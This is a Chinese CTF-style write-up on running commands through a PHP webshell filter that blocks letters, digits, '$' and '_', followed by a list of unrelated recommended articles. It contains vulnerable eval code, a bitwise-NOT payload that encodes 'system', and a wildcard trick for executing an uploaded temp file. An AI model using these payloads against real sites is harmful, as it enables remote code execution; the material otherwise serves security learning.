无字母数字webshell命令执行

复制代码
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

限制:

1.webshell长度不超过35

2.正则过滤掉了数字字母还有$和_

php7环境:

取反

php中'~'表示取反,而取反之后大都是不可见字符

复制代码
<?php
var_dump(urlencode(~'system'));

取反后的值为%8C%86%8C%8B%9A%92

解码:

复制代码
<?php
var_dump(urlencode(~'phpinfo'));

答案如下:

php5环境:

通配符

用通配符来进行匹配,无法准确匹配

但我们要继续通配符

\^a表示这里不为a

0-9表示0-9这个范围

而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用\[\]表示出大写字母就可以了

在ascii表中,大写字母处于@-之间,所以很明确了,使用/???/???????\[@-\[来进行匹配

执行:

复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
   <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file" id="">
        <input type="submit" value="submit">
   </form>
</body>
</html>

写一个form表单上传文件到web.php,使用bp抓包,抓一个上传文件的包和web.php的包

把第一个包的post内容放入web.php中

发送请求

结束

相关推荐
程序员在囧途12 分钟前
likeadmin-api API 中转站怎么做统一报价?从 /pricing、/user/balance 到 task_id 回执的落地方法
运维·服务器·数据库·likeadmin-api·api中转站·token计费
cookies_s_s28 分钟前
C++ 字符串动态创建对象 -- 工厂模式、自动注册、模板递归动态调用
服务器·开发语言·c++
Momo__32 分钟前
Vite 8.1 打包开发模式——10000 组件冷启动 15 倍,"No Bundle Dev" 七年后被自己终结
前端·vue.js·vite
YHL34 分钟前
🤖 Agent 智能体开发实战 · 第一课:Tool Use —— 让大模型自动干活
前端·javascript·人工智能
Monki36 分钟前
AI 规范式 UI 设计,一键批量出页,高效落地不翻车
前端
山河木马36 分钟前
渲染管线-计算得到gl_FragColor(片元着色器)之后续GPU流程
前端·webgl·计算机图形学
不想说话的麋鹿40 分钟前
「项目实战」我用 Codex + GPT-5.5 + Trellis "氛围编程",独立做了一个情侣厨房小程序
前端·agent·全栈
想你依然心痛1 小时前
Linux用户空间与内核空间通信:netlink、ioctl、mmap 零拷贝与性能对比
linux·运维·服务器
沉静的小伙1 小时前
在微服务中使用领域事件
java·运维·微服务
程序员在囧途1 小时前
likeadmin-api API 算力超市怎么做供应商切换?统一鉴权、task_id 和 callback_url 才能稳交付
java·服务器·数据库·开放api·likeadmin-api·api算力超市